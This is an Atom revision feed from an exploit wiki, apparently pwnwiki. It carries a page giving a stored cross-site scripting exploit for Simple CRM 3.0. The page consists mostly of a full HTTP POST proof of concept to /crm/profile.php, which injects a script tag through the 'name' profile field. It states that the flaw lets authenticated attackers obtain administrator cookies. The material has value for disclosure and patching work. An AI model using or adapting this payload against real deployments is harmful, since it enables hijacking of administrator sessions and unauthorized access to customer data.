<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Simple CRM 3.0 XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T23:16:39Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E&amp;diff=5502&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) # Date: 20/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://phpg...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E&amp;diff=5502&amp;oldid=prev"/>
		<updated>2021-06-21T13:53:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Simple CRM 3.0 - &amp;#039;name&amp;#039; Stored Cross site scripting (XSS) # Date: 20/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://phpg...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)&lt;br /&gt;
# Date: 20/06/2021&lt;br /&gt;
# Exploit Author: Riadh Benlamine (rbn0x00)&lt;br /&gt;
# Vendor Homepage: https://phpgurukul.com/&lt;br /&gt;
# Software Link:   https://phpgurukul.com/small-crm-php/&lt;br /&gt;
# Version: 3.0&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Apache2+MariaDB latest version&lt;br /&gt;
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.&lt;br /&gt;
&lt;br /&gt;
Vunlerable page: /crm/profile.php&lt;br /&gt;
&lt;br /&gt;
POC:&lt;br /&gt;
----&lt;br /&gt;
POST /crm/profile.php HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: multipart/form-data;&lt;br /&gt;
boundary=---------------------------386571683933745493952831205283&lt;br /&gt;
Content-Length: 779&lt;br /&gt;
Origin: http://localhost&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost/crm/profile.php&lt;br /&gt;
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;name&amp;quot;&lt;br /&gt;
&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;alt_email&amp;quot;&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;phone&amp;quot;&lt;br /&gt;
0123456789&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;gender&amp;quot;&lt;br /&gt;
m&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;address&amp;quot;&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;update&amp;quot;&lt;br /&gt;
Update&lt;br /&gt;
&lt;br /&gt;
-----------------------------386571683933745493952831205283--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>